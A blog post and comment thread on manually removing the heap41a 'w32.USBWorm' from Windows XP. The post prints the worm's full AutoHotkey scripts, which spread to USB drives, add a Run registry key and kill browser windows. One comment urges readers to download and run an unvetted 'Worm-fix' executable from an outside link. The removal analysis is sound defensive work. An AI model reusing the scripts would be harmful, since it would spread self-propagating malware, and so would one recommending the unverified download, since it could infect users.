w32.USBWorm lets remove this worm manually
May 16
Yesterday, my friend Vinay gave me a usb disk and asked me to copy some movies and music into the disk. I took it home and plugged the USB into my system and scanned it with nod32. I detected some viruses which it removed successfully, least I knew that there was another worm which didn’t get detected and it was in to infect my system. I double clicked the USB drive and nothing happened. Hmm strange.. I right clicked and opened the USB drive and found there was no content. Autoplay appears only if there is a Autorun.inf file present in the root of the drive. I didn’t care it much and closed the window to copy data into the drive later.
I wanted to check my mail so ran my beloved browser Firefox, it opened and with in couple of seconds a message box popped up which said ” “I DNT HATE MOZILLA BUT USE IE OR ELSE…” and the header read “USE INTERNET EXPLORER YOU DOPE.” I was like what? It also terminated Firefox 
. This is when I remembered the Autoplay option in the usb drive. This is when I had to open Internet Explorer and Google this text and found the worm name is w32.USBWorm (it was now obvious). Next step was to search for a Removal Tool and to my amazement there was none available!! Nor I could find any information on how to remove it. I decided to give myself a try to remove this worm. I tried opening orkut and Bang another surprise. This is the message it popped up ” ORKUT IS BANNED,Orkut is banned you fool`,The administrators didnt write this program guess who did?? ” now this is pissing me off. Now, i had no other option but to remove this worm from my system. I pressed ctrl+alt+del and found nothing suspesious there .
Lets see what this worm does
It runs a exe file which is name MicrosoftPowerpoint.exe which is located in the USB disk. The autorun.inf runs this file when double clicked. Once this program is run you are infected. It hides all your hidden folders, runs the process in the memory, makes the worm to start with windows and pops those annoying messages. This worm doesn’t destroy any system files. It just infects other USB drives and spreads to new hosts.
It’s time to KO the Worm
I have PE Tools installed in my PC i ran to find out the running process. I went through all the process and found out that svchost.exe was the one responsible for it. Where PE tools helped me was, svchost.exe was running from a location C:\heap41a . So this is where the worm resides, hmm interesting now deleting the folder would do our task. But it was not so easy, as I terminated this process svchost.exe from the process list it would start again. So I had to boot my XP in safe mode. Why in safe mode is because in safe mode windows loads only the minimum required drivers and doesn’t load any user process, so this means the worm is not started with the windows. Now I searched the folder C:\heap41b but it was hidden. I went to Tools>folder option and select Show all files and folders and pressed ok. I refreshed the c:\ only to find that it won’t show any hidden folders. I again went to the Tools>folder and found the setting of Show all files and folders was reseted. Now how do I see the content, what I did was went to windows search and in advanced option I gave search hidden files and folders and gave svchost.exe as the search keyword. Bang it searched it, so I opened the folder to find out this file was not alone, the other files in this Folder were [offspring], 2.mp3, Icon.ico, reproduce.txt, svchost.exe, drivelist.txt, script1.txt, std.txt . Lets see the content of these text files.
[offspring] – Blank Folder
2.mp3 – A laughing sound
Icon.ico – A blank Icon file
reproduce.txt
#notrayicon
#persistent
ArrayCount = 0
Loop, Read,C:\heap41a\driveList.txt
{
ArrayCount += 1
Array%ArrayCount% := A_LoopReadLine
}
dat1=%userprofile%
settimer,reproduce,5000
returnreproduce:
Loop %ArrayCount%
{element := Array%A_Index%
driveget,data,Type,%element%:\
ifequal,data,Removable
{
driveget,data1,status,%element%:\
ifequal,data1,Ready
{
FileCopydir,C:\heap41a\offspring,%element%:\,1}
}
}
regread,regdata,REG_SZ,HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run,winlogon
ifnotequal,regdata,C:\heap41a\svchost.exe C:\heap41a\std.txt
Regwrite,REG_SZ,HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run,winlogon,C:\heap41a\svchost.exe C:\heap41a\std.txt
return
svchost.exe
This is the file that is the culprit. The file responsible for all the annoying pop ups
script1.txt
#persistent
#notrayicon
settimer,ban,2000
returnban:
WinGetActiveTitle, ed
ifinstring,ed,orkut
{
winclose %ed%
soundplay,C:\heap41a\2.mp3
msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
return
}
ifinstring,ed,youtube
{
winclose %ed%
soundplay,C:\heap41a\2.mp3
msgbox,262160,youtube IS BANNED,youtube is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
return
}
ifinstring,ed,Mozilla Firefox
{
winclose %ed%
msgbox,262160,USE INTERNET EXPLORER YOU DOPE,I DNT HATE MOZILLA BUT USE IE `r OR ELSE…,30
return
}
ifwinactive ahk_class IEFrame
{ControlGetText,ed,edit1,ahk_class IEFrame
ifinstring,ed,orkut
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
return
}
ControlGetText,ed,edit2,ahk_class IEFrame
ifinstring,ed,orkut
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
return
}
ControlGetText,ed,edit3,ahk_class IEFrame
ifinstring,ed,orkut
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
return
}
ControlGetText,ed,edit4,ahk_class IEFrame
ifinstring,ed,orkut
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
return
}
ControlGetText,ed,edit1,ahk_class IEFrame
ifinstring,ed,youtube
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,youtube IS BANNED,youtube is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
return
}
ControlGetText,ed,edit2,ahk_class IEFrame
ifinstring,ed,youtube
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,youtube IS BANNED,youtube is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
return
}
ControlGetText,ed,edit3,ahk_class IEFrame
ifinstring,ed,youtube
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,youtube IS BANNED,youtube is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
return
}
ControlGetText,ed,edit4,ahk_class IEFrame
ifinstring,ed,youtube
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,youtube IS BANNED,youtube is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
return
}}
return
std.txt
#notrayicon
#singleinstance,ignore
regread,regdata,REG_DWORD,HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL,checkedvalue
ifnotequal,regdata,2
regwrite,REG_DWORD,HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL,checkedvalue,2
Run C:\heap41a\svchost.exe C:\heap41a\script1.txt
Run C:\heap41a\svchost.exe C:\heap41a\reproduce.txt
These files gave away all that this worm does, after reading the script I found out that this worm also hates Youtube lol.. Most important information it gave was the Registery Keys it modified.
These are the keys that were responsible for the hidden folder problem I faced earlier
regread,regdata,REG_DWORD,HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\
CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL,checkedvalue
ifnotequal,regdata,2
regwrite,REG_DWORD,HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL,checkedvalue,2
Now to rectify this go to Start Menu>Run and type regedit . In the Registry Editor browse to this entry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\
CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL and in the “Checked all” key reset it back to 1 from 2. Now you can change the settings in the folders option. Now delete the folder C:\heap41a and clear all the key entries from this registry entry HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\
CurrentVersion\policies\Explorer\Run which says heap41a.
Now the virus infection is removed 100%. Before you are done make sure you format the usb drive it doesn’t infect other systems too.
All the best. Untill a tool is out for this worm, you can follow this method to remove w32.USBWorm.
Hey Allwin. My system is not starting in safe mode but simply reboots if safe mode is selected. So I had to start it normally. But as u said heap41a folder is hidden. But i typed c:\heap41 in the windows address bar and surprise surprise…i get the folder,but guess wat? All it’s contents are visible! So I deleted all of it and moved the svchost file to quarantine folder. Then I followed your instructions. But here is the problem, the worm is still there:(
Please help me.
Hey Roy… did u check if the file has repilcated in the heap41a folder? if that is the case then the worm will live on… try to remove the entry in the registry for winlogon in the Explorer/run, and then use a tool to delete the svchost.exe from the folder. A tool like hijackthis should help.Use the option to delete the file on reboot… and please make sure before doing that ….cut the Microsoftpowerpoint.exe and .inf file from the USB drive to the Recycle bin and empty the bin. then try to delete the file , otherwise when u plug the USB the worm is back!!!.. this should take care of the issue.
AWESOME POST DUDE!!!
It helped a lot..
-Cheers
Ali
Hi Allwin Samuel,
Thanks for ur detailed description about how to remove the heap41a virus. I have removed the virus from my PC, but still i cant make any changes on folder options. Means hidden files are not visible. Does it mean still the virus exist in my PC ?? To remove heap41a, i have typed c:\heap41a in run command and deleted the contents from that folder. Plz let me know if any solution is available with out formatting the PC.
Hi Jeba thnx for the information.
As soon as I got infected with this worm I could find out that the culprit process was svchost.exe, what I could not find out was its location. I thought it was the system file which got corrupted and tried repairing those but with funny results.
Now that I now te location of the file its easy now.
As I found it difficult to use orkut, I installed another copy of XP on another partition. Now I can delete the folder from this OS as it is not affected by the worm. This should work. So those who cannot delete it, try deleting from another OS, probably a live distro of Linux like Knoppix or use a dos based Boot CD like Hiren’s Boot CD or UBCD or UBCD4Win.
Also I could find from most responses that many people have been experiencing problems even after deleting the folder. This is most probably because the registry entries have not been deleted. So open the registry editor and search for “C:\heap41a” and dlete all found entries.
Now all problems must be cleared. Let me check myself.
I did all things I thought I should do and it worked.
Now my system absolutely alright.
The key in registry that I could find was in
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run
inside that key there was a value with
Name : winlogon
Data : C:\heap41a\svchost.exe C:\heap41a\std.txt
I removed the value and now I can browse Orkut with ease.
Thnx to Jeba for providing me the location
I did all things I thought I should do (explained in the post just above) and it worked.
Now my system absolutely alright.
The key in registry that I could find was in
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run
inside that key there was a value with
Name : winlogon
Data : C:\heap41a\svchost.exe C:\heap41a\std.txt
I removed the value and now I can browse Orkut with ease.
Thnx to Jeba for providing me the location
THANXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX A LOT Mate!!!!!!!!!!!!!!!!!!!!!!!!!
U ROCK!!!
thanks a lot fer the friendly info dude…u bailed me out…though avast detects the trojan…its unable to do anything about it…cant even delete it or repair the system.!
PHEW Thanx mate
oh man… i suck!! i found the worm the first day it infected my comp… it actually makes multiple copies of itself, an hey thats not all… i guess it allows other viruses to infect your comp as well! anyways now wat happened… i found heap41a .. but then renamed it, deleted all the files cept autohotkey or svchost.exe and then tried moving the file to another location!! it moved… an now i cant find it!!!
btw for ppl unable to do this… for the time being.. there is a way around this.. jus type ctrl+alt+del , and then open ur IE, type in orkut.com, now when the window sayin ‘orkut is banned’ pops up… go back to the task manager and right click on that window, u ll find ‘go to process’, click on it, an t will lead u to one svchost process in the process list, rightclick and end process… walah .. u can browse orkut .. but jeba.. thanks for this buddy!!
Thanks a lot . That’s really awesome Man!
Thanks It helped me remove the virus
Hi Allwin:
My comp is also infected by this damned worm…
I am running Windows XP Professional Service Pack 2. I have to warn you that I am only partially Windows XP literate.
I tried follwing your instructions while running Windows in Safe Mode but when I got to your instruction:
“In the Registry Editor browse to this entry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL and in the “Checked all†key reset it back to 1 from 2″
I could not find the “Checked all†key in the list.
All I see is:
Checked Value REG_DWORD 0×00000000(0) and
Default Value REG_DWORD 0×00000002(2)
and seven other entries.
To follow your instruction, I need to find the the “Checked all†key and reset it back to 1 from 2.
Help!
Thanks in advance…
Hi Jeba,
Thanx dude…. Its a really a helped me a lot…..
My friend pc infected by this virus…… So now its working fine
Thanx a lot….
I am not able to fix the problem
in HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\
CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL right hand box there are values for checked value (0) and default value (2). which one has to be changed. after changing checked value to 1 i am able to c the hidden files but still there is no heap41a found on giving search.
Pl help me out
I have the same problem as Amit…
Help us!
Hello DecNaz and Amit..
I suggest you search this worm in this folder.
“c:\documentsandsettings\WINDWOS-USERNAME\LocalSettings\Temp\MicrosoftPowerpoint
it has been found sometimes to be residing in this folder too.. Happy Hunting
Thats all I can say!, I couldnt even search the solution as the this worm detects any occurance of the word orkut and kills that window! Your window opened, and later I followed the guidlines on my gprs to clean my laptop!
Glad you find these tutorial useful. Don’t forget to share it with your friends and buddies so even they can take advantage of this tutorial.
Very very thanks!!!
It is very useful to me because my pc was infected by browsing an USB pendrive
My systems network application also stopped
I had to reinstall my OS
Why?
Here’s what i think is a simpler way to get rid of the trojan: http://arsetard.blogspot.com/
By the way, i’ve used your way to clean these trojans for over 50 times after which i discovered my method. THanks man.. many cheers!
same happened to me !!! thanks 4 the support .. however from when can the usb drive be infected .. or any particular website
The usb drive can be infected by inserting the usb drive in already infected system.
Hey Thnxs….
My friend pc infected by this virus…… I removed the Virus thanks for u r help…..So now its working fine……..
hey Dude,
i cant open the regedit in run. after i typed and pressed enter it produce a sound bt nothing happened the registry editor was not open. help me out pls…:(
Thanks a Billion buddy!! I was spending a whole 2 days in vain until I saw your post…
hai
pls help me
i cant access my orkut account on my pc . when i write the address on url then there appeares a message thet
orkut is banned u fool, its not don by the administator , guess who did, MUHAHAHA
so i cant get in to touch with my friends abrode pls find a solution for me
with regards shambu_777
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\
CheckedValue = 1
DefaultValue = 2
That fixed the hidden folder issue with me.
HKEY_LOCAL_MACHINE\
SOFTWARE\
Microsoft\
Windows\
CurrentVersion\
Explorer\
Advanced\
Folder\
Hidden\
SHOWALL\
CheckedValue = 1
DefaultValue = 2
That fixed the hidden folder issue with me.
Dude u seem intelligent than others
I have manually tried to stop the worm and I succeded.
The way u say I have already explored.
That way does not remove the scripts
1st
You can access hidden folder by typing in the address box:
C:\heap41a
Use Hijack this preferable to PE explore
end the SVCHOST.exe process that is not system.
delete contents of heap41a as found above
(if u end system one, then u will suck and u will come to know y)
50% problem solved
DONT DONT DONT open any folder and close all open
Once Ended,
_______________________________________________
Method 1
Run Nero Start Smart, Not from any folder but start menu, or desktop—- take care of this —Not from any folder
Now go to task manager and end EXPLORER.exe and SVCHOST.exe again (SVCHOST.EXE that is consuming the least memory )
y?
The script that this guy is showing is autorun from autorun.inf files in all the folders as u navigate through them or open them.
and again the Virus is activated even when the main protecting process of it has been ended.
No once u ended explorer
Burn disc in Nero.
Navigate through all the folders via nero, from drive to inside, all the folders.
U will see an autorun.inf file in all folders.
delete them all
________________________________________________
Method 2
If u hacve kaspersky 7.0.0.121 or above then do the virus scan and disable ichecker and iswift
and delete all the infected autorun files
_________________________________________________
After the above methods:
Go to registry editor and find “heap”
delete all the values, keys
find “microsoftPowerPoint” delete all keys
find “MUI” in shellnoroam and delete all keys
U r done
hello
i did as u directed..but wen i reached ‘showall’ in hidden section,there is no key named ‘checked all’…pls hepl me…dis worm is really bugging me..pls direct me now wat 2 do..n also after removing this worm how do i format usb drive..pls help fast..
thnk u
Hii ,
excellent post man ! quite descriptive ..
to all those novice guys there who r finding problem with editing the registry to find the virus directory and delete it ..
there is a easy solution as u know the location of the virus use dos to delete it .
go to run prompt type cmd there .
the dos prompt will open .
using cd to change directory
cd // to change direcotry to to dir-name
dir // to view the content of the directory
go to c:/heap41a
then using commands like deltree, del , rmdir delete the dir .. but before that you have to terminat the svchost.exe which running from this dir.
for that someone has given a very elegant,pratical solution …
open taskmanger by pressing alt+ctrl+del
try opening orkut in our IE and when the pop up comes go to taks maneger > applications right click and click on go to process . it will tell you which svchost.exe to end.
once it is done you can delete C:\heap41a by using dos commands.
the problem will be solved.
Dear Allwin Samuel Jeba,
I was not affected with this virus,but was searching for a removal tool to help my friend to remove it.Then I saw a plagarised post in Digital Inspiration forums here
http://www.labnol.org/forums/topic/help-youtube-is-banned-hack
In that post a part of your above article is copied word by word without a credit,by a forum user.it starts like
“It’s time for dissestion
I went through all the process and found out that svchost.exe was the one responsible for it. Where PE tools helped me was svchost.exe was running from a location C:\heap41a . So this is where the worm resides. Interesting, so deleting the folder would do our task. But it was not so easy, as I terminated this process …….”.and goes on.
Please take note of it.
Moitheensha
Hello Moitheensha,
I really want to thank you for reporting this. I will contact the owner of the blog and get it removed or get proper credentials for it.
Thank You
Hi,
i value your effort and thats why i reported it.the owner of that blog is one of the influential bloggers from india and he may not be aware of the whole matter.let’s hope he will show justice to your time and hard work.
Thanx for the removal tip nayway,
moitheensha
tx Allwin, it was a great help for me, as i am running cyber cafe and all my pc was affected by that worm
tanks man for dis gr8 help….
i dono much abt coputer …even then i did it bcoz of ur eas tutorial……tanks……………
well i had followed the 1 step of deleting the contents in c:\heap41a but could not open regedit or msconfig also found that i could not open command prompt in safe mode but it opens in safe mode command promt only . please advice what else is to be checked .. using win xp pro sp2 …..
thanks a lot for the detection of the script ..but man i must admit some one sure used his head well creating the script
i guess its a admin trying to restrict his lan members accessing the particular sites
thanks, finally after a long time, i found t way to remove microsoftpowerpoint.exe-svchost.exe in my pendrive
thanks even i was suffering from the orkut banned probs but now rectified noe thanks a lot
you desirve great round of appolus
Its a worm infection (may be adware or spyware)
For removal of that… run any anti spyware software for your
machine.
Or to resolve your problame for temporary press Ctrl + Alt + Del and
end the
svchost.exe which are not related to any system process
Here is the fix for Orkut, Youtube, Fireox Blocker (Heap41a /
win32.USBWorm)
This tool can be used to remove the Blocker worm as well as prevent
the Worm further to get infected on the same machine.
or take a look here —
http://slynux.org/downloads/Worm-fix.exe.zip ( posting external
link )
Usage Instructions:
1) Download the fix and run on infected machine.
2) It will ask for a re login.
3) After logging again run the fix again. The worm will be removed
succesully.
IT REALLY WORKS…TRUST ME, IM TELLING U BECAUSE I’VE TRIED IT ALREADY. NO NEED TO GO INTO SOME LENGTHY PROCESS…JUST UNZIP AND RUN IT, IT WILL BE GONE IN SECONDS!!!
I couldn’t understand some parts of this article w32.USBWorm lets remove this worm manually, but I guess I just need to check some more resources regarding this, because it sounds interesting.
Hi Allwin Samuel Jeba,
I have done all the steps and have removed the files…
But the problem is that the foldersd i have explored during this process have been hidden and an exe file of that folder is present instead of it… after changing the registry entry… still i am not able to view those folders…
plz help me out…
i dunno, this worked for me.
just edit the properties for the C:\heap41a folder, and remove all users, everyone, the system, your user, and the worm wont be able to execute anything on the folder.
you can later, remove its contents.
how will you operate that HijackThis
Sushmita or others please tell me how did u operate that HijackThis software!
hi…
very good job……….thanx to u……
Thx a lot dude ..
U’re a life saver …
Good Work !!!